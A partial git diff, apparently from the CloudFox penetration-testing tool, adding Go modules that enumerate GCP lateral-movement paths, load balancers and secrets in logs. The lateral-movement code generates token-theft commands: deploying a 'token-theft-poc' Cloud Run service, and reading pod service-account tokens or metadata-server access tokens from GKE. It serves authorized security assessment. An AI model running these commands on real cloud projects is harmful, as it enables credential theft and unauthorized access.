gcr.io/%s/token-theft-poc \ + --region=%s --service-account=%s \ + --allow-unauthenticated --project=%s`, + projectID, svc.Region, svc.ServiceAccount, projectID) + + path := LateralMovementPath{ + Source: svc.Name, + SourceType: "cloud_run", + Target: svc.ServiceAccount, + Method: "Steal Token (Container)", + Category: "Cloud Run Token Theft", + Permissions: []string{"run.services.create", "iam.serviceAccounts.actAs"}, + Description: fmt.Sprintf("Cloud Run service %s runs with SA %s", svc.Name, svc.ServiceAccount), + RiskLevel: "HIGH", + ExploitCommand: exploitCmd, + ProjectID: projectID, + } + + m.mu.Lock() + m.ProjectPaths[projectID] = append(m.ProjectPaths[projectID], path) + m.addPathToLoot(path, projectID) 
+ m.mu.Unlock() + } +} + +// findGKEVectors finds GKE clusters/node pools where tokens can be stolen +func (m *LateralMovementModule) findGKEVectors(ctx context.Context, projectID string, logger internal.Logger) { + gkeService := GKEService.New() + + clusters, nodePools, err := gkeService.Clusters(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, + fmt.Sprintf("Could not get GKE clusters in project %s", projectID)) + } + return + } + + // Track cluster SAs to avoid duplicates in node pools + clusterSAs := make(map[string]string) + + for _, cluster := range clusters { + if cluster.NodeServiceAccount != "" { + clusterSAs[cluster.Name] = cluster.NodeServiceAccount + + var exploitCmd string + if cluster.WorkloadIdentity != "" { + exploitCmd = fmt.Sprintf(`# Cluster uses Workload Identity - tokens are pod-specific +gcloud container clusters get-credentials %s --location=%s --project=%s +kubectl exec -it -- cat /var/run/secrets/kubernetes.io/serviceaccount/token`, + cluster.Name, cluster.Location, projectID) + } else { + exploitCmd = fmt.Sprintf(`# Cluster uses node SA - all pods can access node SA +gcloud container clusters get-credentials %s --location=%s --project=%s +kubectl exec -it -- curl -s -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"`, + cluster.Name, cluster.Location, projectID) + } + + path := LateralMovementPath{ + Source: cluster.Name, + SourceType: "gke_cluster", + Target: cluster.NodeServiceAccount, + Method: "Steal Token (Pod)", + Category: "GKE Cluster Token Theft", + Permissions: []string{"container.clusters.getCredentials", "container.pods.exec"}, + Description: fmt.Sprintf("GKE cluster %s uses node SA %s", cluster.Name, cluster.NodeServiceAccount), + RiskLevel: "HIGH", + ExploitCommand: exploitCmd, + ProjectID: projectID, + } + + m.mu.Lock() + 
m.ProjectPaths[projectID] = append(m.ProjectPaths[projectID], path) + m.addPathToLoot(path, projectID) + m.mu.Unlock() + } + } + + // Process node pools with different SAs than their cluster + for _, np := range nodePools { + clusterSA := clusterSAs[np.ClusterName] + if np.ServiceAccount == "" || np.ServiceAccount == clusterSA { + continue + } + + exploitCmd := fmt.Sprintf(`# Node pool %s uses specific SA +gcloud container clusters get-credentials %s --location=%s --project=%s +# Exec into pod running on this node pool and steal token`, + np.Name, np.ClusterName, np.Location, projectID) + + path := LateralMovementPath{ + Source: fmt.Sprintf("%s/%s", np.ClusterName, np.Name), + SourceType: "gke_nodepool", + Target: np.ServiceAccount, + Method: "Steal Token (Pod)", + Category: "GKE Node Pool Token Theft", + Permissions: []string{"container.clusters.getCredentials", "container.pods.exec"}, + Description: fmt.Sprintf("GKE node pool %s/%s uses SA %s", np.ClusterName, np.Name, np.ServiceAccount), + RiskLevel: "HIGH", + ExploitCommand: exploitCmd, + ProjectID: projectID, + } + + m.mu.Lock() + m.ProjectPaths[projectID] = append(m.ProjectPaths[projectID], path) + m.addPathToLoot(path, projectID) + m.mu.Unlock() + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *LateralMovementModule) addPathToLoot(path LateralMovementPath, projectID string) { + lootFile := m.LootMap[projectID]["lateral-movement-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# %s -> %s\n"+ + "# =============================================================================\n"+ + "# Method: %s\n"+ + "# Category: %s\n"+ + "# Source: %s (%s)\n"+ + "# Target: %s\n"+ + "# Permissions: %s\n"+ + "%s\n\n", + path.Source, path.Target, + path.Method, + path.Category, + path.Source, path.SourceType, + path.Target, + 
strings.Join(path.Permissions, ", "), + path.ExploitCommand, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *LateralMovementModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *LateralMovementModule) getHeader() []string { + return []string{ + "Project", + "Source", + "Source Type", + "Target", + "Method", + "Category", + "Risk Level", + } +} + +func (m *LateralMovementModule) getFoxMapperHeader() []string { + return []string{ + "Scope Type", + "Scope ID", + "Principal Type", + "Principal", + "Category", + "Permission", + "Description", + } +} + +func (m *LateralMovementModule) pathsToTableBody(paths []LateralMovementPath) [][]string { + var body [][]string + for _, path := range paths { + body = append(body, []string{ + m.GetProjectName(path.ProjectID), + path.Source, + path.SourceType, + path.Target, + path.Method, + path.Category, + path.RiskLevel, + }) + } + return body +} + +// foxMapperFindingsForProject returns findings for a specific project +// Includes: SAs from that project + users/groups (which can access any project) +// Also filters by scope: only org/folder/project findings in the project's hierarchy +func (m *LateralMovementModule) foxMapperFindingsForProject(projectID string) [][]string { + var body [][]string + + // Get ancestor folders and org for filtering + var ancestorFolders []string + var projectOrgID string + if m.OrgCache != nil && m.OrgCache.IsPopulated() { + ancestorFolders = m.OrgCache.GetProjectAncestorFolders(projectID) + projectOrgID = m.OrgCache.GetProjectOrgID(projectID) + } + ancestorFolderSet := make(map[string]bool) + for _, f := range ancestorFolders { + ancestorFolderSet[f] = true + } + + for _, f := range m.FoxMapperFindings { + for _, p := range f.Principals { + principalProject := 
extractProjectFromPrincipal(p.Principal, m.OrgCache) + + // Include if: SA from this project OR user/group (no project) + if principalProject != projectID && principalProject != "" { + continue + } + + // Filter by scope hierarchy + if !m.scopeMatchesProject(p.ScopeType, p.ScopeID, projectID, projectOrgID, ancestorFolderSet) { + continue + } + + principalType := p.MemberType + if principalType == "" { + if p.IsServiceAccount { + principalType = "serviceAccount" + } else { + principalType = "user" + } + } + + scopeType := p.ScopeType + if scopeType == "" { + scopeType = "-" + } + scopeID := p.ScopeID + if scopeID == "" { + scopeID = "-" + } + + body = append(body, []string{ + scopeType, + scopeID, + principalType, + p.Principal, + f.Category, + f.Permission, + f.Description, + }) + } + } + return body +} + +// foxMapperFindingsToTableBody returns all findings (for flat output) +func (m *LateralMovementModule) foxMapperFindingsToTableBody() [][]string { + var body [][]string + for _, f := range m.FoxMapperFindings { + for _, p := range f.Principals { + principalType := p.MemberType + if principalType == "" { + if p.IsServiceAccount { + principalType = "serviceAccount" + } else { + principalType = "user" + } + } + + scopeType := p.ScopeType + if scopeType == "" { + scopeType = "-" + } + scopeID := p.ScopeID + if scopeID == "" { + scopeID = "-" + } + + body = append(body, []string{ + scopeType, + scopeID, + principalType, + p.Principal, + f.Category, + f.Permission, + f.Description, + }) + } + } + return body +} + +func (m *LateralMovementModule) buildTablesForProject(projectID string) []internal.TableFile { + // No longer outputting the old lateral-movement table + // All findings are now in lateral-movement-permissions + return []internal.TableFile{} +} + +// scopeMatchesProject checks if a scope (org/folder/project) is in the hierarchy for a project +func (m *LateralMovementModule) scopeMatchesProject(scopeType, scopeID, projectID, projectOrgID string, 
ancestorFolderSet map[string]bool) bool { + if scopeType == "" || scopeID == "" { + // No scope info - include by default + return true + } + + switch scopeType { + case "project": + return scopeID == projectID + case "organization": + if projectOrgID != "" { + return scopeID == projectOrgID + } + // No org info - include by default + return true + case "folder": + if len(ancestorFolderSet) > 0 { + return ancestorFolderSet[scopeID] + } + // No folder info - include by default + return true + case "resource": + // Resource-level - include by default + return true + default: + return true + } +} + +func (m *LateralMovementModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + FolderLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Process each specified project + for _, projectID := range m.ProjectIDs { + var tableFiles []internal.TableFile + + // Add FoxMapper findings table for this project (the only table now) + foxMapperBody := m.foxMapperFindingsForProject(projectID) + if len(foxMapperBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "lateral-movement-permissions", + Header: m.getFoxMapperHeader(), + Body: foxMapperBody, + }) + } + + // Add project-specific playbook (only one loot file per project) + var lootFiles []internal.LootFile + playbook := m.generatePlaybookForProject(projectID) + if playbook != nil && playbook.Contents != "" { + lootFiles = append(lootFiles, *playbook) + } + + // Always add all specified projects to output + outputData.ProjectLevelData[projectID] = LateralMovementOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + 
logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), GCP_LATERALMOVEMENT_MODULE_NAME) + } +} + +func (m *LateralMovementModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + tables := []internal.TableFile{} + + // Only output the permissions table (not the old lateral-movement table) + if len(m.FoxMapperFindings) > 0 { + tables = append(tables, internal.TableFile{ + Name: "lateral-movement-permissions", + Header: m.getFoxMapperHeader(), + Body: m.foxMapperFindingsToTableBody(), + }) + } + + // Add per-project playbooks + var lootFiles []internal.LootFile + for _, projectID := range m.ProjectIDs { + playbook := m.generatePlaybookForProject(projectID) + if playbook != nil && playbook.Contents != "" { + playbook.Name = fmt.Sprintf("lateral-movement-commands-%s", projectID) + lootFiles = append(lootFiles, *playbook) + } + } + + output := LateralMovementOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_LATERALMOVEMENT_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/loadbalancers.go b/gcp/commands/loadbalancers.go new file mode 100755 index 00000000..1de55423 --- /dev/null +++ b/gcp/commands/loadbalancers.go @@ -0,0 +1,514 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/gcp/shared" + + diagramservice "github.com/BishopFox/cloudfox/gcp/services/diagramService" + loadbalancerservice "github.com/BishopFox/cloudfox/gcp/services/loadbalancerService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal 
"github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPLoadBalancersCommand = &cobra.Command{ + Use: globals.GCP_LOADBALANCERS_MODULE_NAME, + Aliases: []string{"lb", "lbs"}, + Short: "Enumerate Load Balancers", + Long: `Enumerate Load Balancers and related configurations. + +Features: +- Lists all forwarding rules (global and regional) +- Shows backend services and health checks +- Analyzes SSL policies for weak configurations +- Identifies external vs internal load balancers +- Checks for Cloud Armor security policies`, + Run: runGCPLoadBalancersCommand, +} + +type LoadBalancersModule struct { + gcpinternal.BaseGCPModule + ProjectLoadBalancers map[string][]loadbalancerservice.LoadBalancerInfo // projectID -> load balancers + ProjectSSLPolicies map[string][]loadbalancerservice.SSLPolicyInfo // projectID -> SSL policies + ProjectBackendServices map[string][]loadbalancerservice.BackendServiceInfo // projectID -> backend services + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +type LoadBalancersOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o LoadBalancersOutput) TableFiles() []internal.TableFile { return o.Table } +func (o LoadBalancersOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPLoadBalancersCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_LOADBALANCERS_MODULE_NAME) + if err != nil { + return + } + + module := &LoadBalancersModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectLoadBalancers: make(map[string][]loadbalancerservice.LoadBalancerInfo), + ProjectSSLPolicies: make(map[string][]loadbalancerservice.SSLPolicyInfo), + ProjectBackendServices: make(map[string][]loadbalancerservice.BackendServiceInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m 
*LoadBalancersModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_LOADBALANCERS_MODULE_NAME, m.processProject) + + allLoadBalancers := m.getAllLoadBalancers() + allSSLPolicies := m.getAllSSLPolicies() + allBackendServices := m.getAllBackendServices() + + if len(allLoadBalancers) == 0 { + logger.InfoM("No load balancers found", globals.GCP_LOADBALANCERS_MODULE_NAME) + return + } + + externalCount := 0 + for _, lb := range allLoadBalancers { + if lb.Scheme == "EXTERNAL" { + externalCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d load balancer(s) (%d external), %d SSL policies, %d backend services", + len(allLoadBalancers), externalCount, len(allSSLPolicies), len(allBackendServices)), globals.GCP_LOADBALANCERS_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *LoadBalancersModule) getAllLoadBalancers() []loadbalancerservice.LoadBalancerInfo { + var all []loadbalancerservice.LoadBalancerInfo + for _, lbs := range m.ProjectLoadBalancers { + all = append(all, lbs...) + } + return all +} + +func (m *LoadBalancersModule) getAllSSLPolicies() []loadbalancerservice.SSLPolicyInfo { + var all []loadbalancerservice.SSLPolicyInfo + for _, policies := range m.ProjectSSLPolicies { + all = append(all, policies...) + } + return all +} + +func (m *LoadBalancersModule) getAllBackendServices() []loadbalancerservice.BackendServiceInfo { + var all []loadbalancerservice.BackendServiceInfo + for _, services := range m.ProjectBackendServices { + all = append(all, services...) 
+ } + return all +} + +func (m *LoadBalancersModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating load balancers in project: %s", projectID), globals.GCP_LOADBALANCERS_MODULE_NAME) + } + + svc := loadbalancerservice.New() + + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["loadbalancers-commands"] = &internal.LootFile{ + Name: "loadbalancers-commands", + Contents: "# Load Balancer Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + m.mu.Unlock() + + // Get load balancers + lbs, err := svc.ListLoadBalancers(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_LOADBALANCERS_MODULE_NAME, + fmt.Sprintf("Could not list load balancers in project %s", projectID)) + } else { + m.mu.Lock() + m.ProjectLoadBalancers[projectID] = lbs + for _, lb := range lbs { + m.addToLoot(projectID, lb) + } + m.mu.Unlock() + } + + // Get SSL policies + sslPolicies, err := svc.ListSSLPolicies(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_LOADBALANCERS_MODULE_NAME, + fmt.Sprintf("Could not list SSL policies in project %s", projectID)) + } else { + m.mu.Lock() + m.ProjectSSLPolicies[projectID] = sslPolicies + m.mu.Unlock() + } + + // Get backend services + backends, err := svc.ListBackendServices(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_LOADBALANCERS_MODULE_NAME, + fmt.Sprintf("Could not list backend services in project %s", projectID)) + } else { + m.mu.Lock() + m.ProjectBackendServices[projectID] = backends + m.mu.Unlock() + } +} + +func (m *LoadBalancersModule) addToLoot(projectID string, lb 
loadbalancerservice.LoadBalancerInfo) { + lootFile := m.LootMap[projectID]["loadbalancers-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# LOAD BALANCER: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Type: %s, Scheme: %s, IP: %s, Port: %s\n\n", + lb.Name, lb.ProjectID, lb.Type, lb.Scheme, lb.IPAddress, lb.Port) + + lootFile.Contents += "# === ENUMERATION COMMANDS ===\n\n" + + // Describe forwarding rule + if lb.Region == "global" { + lootFile.Contents += fmt.Sprintf( + "# Describe global forwarding rule:\n"+ + "gcloud compute forwarding-rules describe %s --global --project=%s\n\n", + lb.Name, lb.ProjectID) + } else { + lootFile.Contents += fmt.Sprintf( + "# Describe regional forwarding rule:\n"+ + "gcloud compute forwarding-rules describe %s --region=%s --project=%s\n\n", + lb.Name, lb.Region, lb.ProjectID) + } + + // Backend service commands + for _, backend := range lb.BackendServices { + lootFile.Contents += fmt.Sprintf( + "# Describe backend service:\n"+ + "gcloud compute backend-services describe %s --global --project=%s\n\n", + backend, lb.ProjectID) + } +} + +func (m *LoadBalancersModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Generate ASCII diagram and add to loot + diagram := m.generateLoadBalancerDiagram() + if diagram != "" { + // Add diagram to the first project's loot + for projectID := range m.LootMap { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + m.LootMap[projectID]["loadbalancers-diagram"] = &internal.LootFile{ + Name: "loadbalancers-diagram", + Contents: diagram, + } + break // Only add once for flat output + } + + // For hierarchical output, add to all projects + if m.Hierarchy != nil && !m.FlatOutput { + for projectID := range m.LootMap { + if m.LootMap[projectID] == 
nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + m.LootMap[projectID]["loadbalancers-diagram"] = &internal.LootFile{ + Name: "loadbalancers-diagram", + Contents: diagram, + } + } + } + } + + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// ------------------------------ +// Diagram Generation +// ------------------------------ + +// generateLoadBalancerDiagram creates an ASCII visualization of load balancer architecture +func (m *LoadBalancersModule) generateLoadBalancerDiagram() string { + allLBs := m.getAllLoadBalancers() + if len(allLBs) == 0 { + return "" + } + + // Build a map of backend service name -> actual backends (instance groups, NEGs) + backendDetailsMap := make(map[string][]string) + for _, backends := range m.ProjectBackendServices { + for _, be := range backends { + if len(be.Backends) > 0 { + backendDetailsMap[be.Name] = be.Backends + } + } + } + + // Convert to diagram service types + diagramLBs := make([]diagramservice.LoadBalancerInfo, 0, len(allLBs)) + for _, lb := range allLBs { + // Build backend details for this LB + lbBackendDetails := make(map[string][]string) + for _, beSvc := range lb.BackendServices { + if targets, ok := backendDetailsMap[beSvc]; ok { + lbBackendDetails[beSvc] = targets + } + } + + diagramLBs = append(diagramLBs, diagramservice.LoadBalancerInfo{ + Name: lb.Name, + Type: lb.Type, + Scheme: lb.Scheme, + IPAddress: lb.IPAddress, + Port: lb.Port, + Region: lb.Region, + BackendServices: lb.BackendServices, + SecurityPolicy: lb.SecurityPolicy, + BackendDetails: lbBackendDetails, + }) + } + + // Determine project ID for header (use first project if multiple) + projectID := "" + if len(m.ProjectIDs) == 1 { + projectID = m.ProjectIDs[0] + } + + return diagramservice.DrawLoadBalancerDiagram(diagramLBs, projectID, 90) +} + +func (m *LoadBalancersModule) getLBHeader() []string { + return []string{"Project", "Name", 
"Type", "Scheme", "Region", "IP Address", "Port", "Backend Services", "Security Policy"} +} + +func (m *LoadBalancersModule) getSSLHeader() []string { + return []string{"Project", "Name", "Min TLS Version", "Profile", "Custom Features"} +} + +func (m *LoadBalancersModule) getBackendHeader() []string { + return []string{"Project", "Name", "Protocol", "Port", "Security Policy", "CDN Enabled", "Health Check", "Session Affinity", "Backends"} +} + +func (m *LoadBalancersModule) lbsToTableBody(lbs []loadbalancerservice.LoadBalancerInfo) [][]string { + var body [][]string + for _, lb := range lbs { + backends := "-" + if len(lb.BackendServices) > 0 { + backends = strings.Join(lb.BackendServices, ", ") + } + secPolicy := "-" + if lb.SecurityPolicy != "" { + secPolicy = lb.SecurityPolicy + } + body = append(body, []string{ + m.GetProjectName(lb.ProjectID), + lb.Name, + lb.Type, + lb.Scheme, + lb.Region, + lb.IPAddress, + lb.Port, + backends, + secPolicy, + }) + } + return body +} + +func (m *LoadBalancersModule) sslPoliciesToTableBody(policies []loadbalancerservice.SSLPolicyInfo) [][]string { + var body [][]string + for _, policy := range policies { + customFeatures := "-" + if len(policy.CustomFeatures) > 0 { + customFeatures = strings.Join(policy.CustomFeatures, ", ") + } + body = append(body, []string{ + m.GetProjectName(policy.ProjectID), + policy.Name, + policy.MinTLSVersion, + policy.Profile, + customFeatures, + }) + } + return body +} + +func (m *LoadBalancersModule) backendServicesToTableBody(services []loadbalancerservice.BackendServiceInfo) [][]string { + var body [][]string + for _, be := range services { + secPolicy := "-" + if be.SecurityPolicy != "" { + secPolicy = be.SecurityPolicy + } + healthCheck := "-" + if be.HealthCheck != "" { + healthCheck = be.HealthCheck + } + sessionAffinity := "-" + if be.SessionAffinity != "" { + sessionAffinity = be.SessionAffinity + } + backends := "-" + if len(be.Backends) > 0 { + backends = strings.Join(be.Backends, ", ") + } 
+ body = append(body, []string{ + m.GetProjectName(be.ProjectID), + be.Name, + be.Protocol, + fmt.Sprintf("%d", be.Port), + secPolicy, + shared.BoolToYesNo(be.EnableCDN), + healthCheck, + sessionAffinity, + backends, + }) + } + return body +} + +func (m *LoadBalancersModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if lbs, ok := m.ProjectLoadBalancers[projectID]; ok && len(lbs) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "load-balancers-frontends", + Header: m.getLBHeader(), + Body: m.lbsToTableBody(lbs), + }) + } + + if policies, ok := m.ProjectSSLPolicies[projectID]; ok && len(policies) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "ssl-policies", + Header: m.getSSLHeader(), + Body: m.sslPoliciesToTableBody(policies), + }) + } + + if services, ok := m.ProjectBackendServices[projectID]; ok && len(services) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "load-balancers-backend-services", + Header: m.getBackendHeader(), + Body: m.backendServicesToTableBody(services), + }) + } + + return tableFiles +} + +func (m *LoadBalancersModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Get all project IDs that have data + projectIDs := make(map[string]bool) + for projectID := range m.ProjectLoadBalancers { + projectIDs[projectID] = true + } + for projectID := range m.ProjectSSLPolicies { + projectIDs[projectID] = true + } + for projectID := range m.ProjectBackendServices { + projectIDs[projectID] = true + } + + for projectID := range projectIDs { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && 
loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = LoadBalancersOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_LOADBALANCERS_MODULE_NAME) + } +} + +func (m *LoadBalancersModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allLBs := m.getAllLoadBalancers() + allSSL := m.getAllSSLPolicies() + allBackends := m.getAllBackendServices() + + var tables []internal.TableFile + + if len(allLBs) > 0 { + tables = append(tables, internal.TableFile{ + Name: "load-balancers-frontends", + Header: m.getLBHeader(), + Body: m.lbsToTableBody(allLBs), + }) + } + + if len(allSSL) > 0 { + tables = append(tables, internal.TableFile{ + Name: "ssl-policies", + Header: m.getSSLHeader(), + Body: m.sslPoliciesToTableBody(allSSL), + }) + } + + if len(allBackends) > 0 { + tables = append(tables, internal.TableFile{ + Name: "load-balancers-backend-services", + Header: m.getBackendHeader(), + Body: m.backendServicesToTableBody(allBackends), + }) + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := LoadBalancersOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, 
scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_LOADBALANCERS_MODULE_NAME) + } +} diff --git a/gcp/commands/logenum.go b/gcp/commands/logenum.go new file mode 100644 index 00000000..ff645138 --- /dev/null +++ b/gcp/commands/logenum.go @@ -0,0 +1,277 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + logenumservice "github.com/BishopFox/cloudfox/gcp/services/logEnumService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var ( + logEnumHours int + logEnumMaxEntries int + logEnumLogName string +) + +var GCPLoggingEnumCommand = &cobra.Command{ + Use: globals.GCP_LOGGINGENUM_MODULE_NAME, + Aliases: []string{"logging-enum", "log-scan", "sensitive-logs"}, + Short: "Scan Cloud Logging entries for sensitive data (credentials, tokens, PII)", + Long: `Scan Cloud Logging entries for potentially sensitive data. + +This module reads recent log entries and applies content-based pattern matching +to detect credentials, secrets, tokens, PII, and other sensitive information +that may have been inadvertently logged. 
+ +Content patterns detected: +- Credentials: GCP SA keys, private keys, AWS access keys, API keys +- Secrets: Password assignments, bearer tokens, connection strings +- Tokens: JWTs, OAuth tokens, GitHub tokens +- PII: Credit card numbers, SSN patterns + +Flags: + --hours Hours of logs to scan (default 168 = 7 days) + --max-entries Maximum log entries to process per project (default 50000) + --log-name Optional: filter to a specific log name`, + Run: runGCPLoggingEnumCommand, +} + +func init() { + GCPLoggingEnumCommand.Flags().IntVar(&logEnumHours, "hours", 168, "Hours of logs to scan (default 168 = 7 days)") + GCPLoggingEnumCommand.Flags().IntVar(&logEnumMaxEntries, "max-entries", 50000, "Maximum log entries to process per project") + GCPLoggingEnumCommand.Flags().StringVar(&logEnumLogName, "log-name", "", "Optional: filter to a specific log name") +} + +type LogEnumModule struct { + gcpinternal.BaseGCPModule + ProjectEntries map[string][]logenumservice.SensitiveLogEntry + LootMap map[string]map[string]*internal.LootFile + Hours int + MaxEntries int + LogNameFilter string + mu sync.Mutex +} + +type LogEnumOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o LogEnumOutput) TableFiles() []internal.TableFile { return o.Table } +func (o LogEnumOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPLoggingEnumCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_LOGGINGENUM_MODULE_NAME) + if err != nil { + return + } + + module := &LogEnumModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectEntries: make(map[string][]logenumservice.SensitiveLogEntry), + LootMap: make(map[string]map[string]*internal.LootFile), + Hours: logEnumHours, + MaxEntries: logEnumMaxEntries, + LogNameFilter: logEnumLogName, + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *LogEnumModule) Execute(ctx context.Context, logger internal.Logger) { + 
logger.InfoM(fmt.Sprintf("Scanning log entries (last %d hours, max %d entries per project)...", + m.Hours, m.MaxEntries), globals.GCP_LOGGINGENUM_MODULE_NAME) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_LOGGINGENUM_MODULE_NAME, m.processProject) + + allEntries := m.getAllEntries() + if len(allEntries) == 0 { + logger.InfoM("No sensitive log entries found", globals.GCP_LOGGINGENUM_MODULE_NAME) + return + } + + // Count by risk level + criticalCount := 0 + highCount := 0 + for _, entry := range allEntries { + switch entry.RiskLevel { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d sensitive log entries (%d CRITICAL, %d HIGH)", + len(allEntries), criticalCount, highCount), globals.GCP_LOGGINGENUM_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +func (m *LogEnumModule) getAllEntries() []logenumservice.SensitiveLogEntry { + var all []logenumservice.SensitiveLogEntry + for _, entries := range m.ProjectEntries { + all = append(all, entries...) 
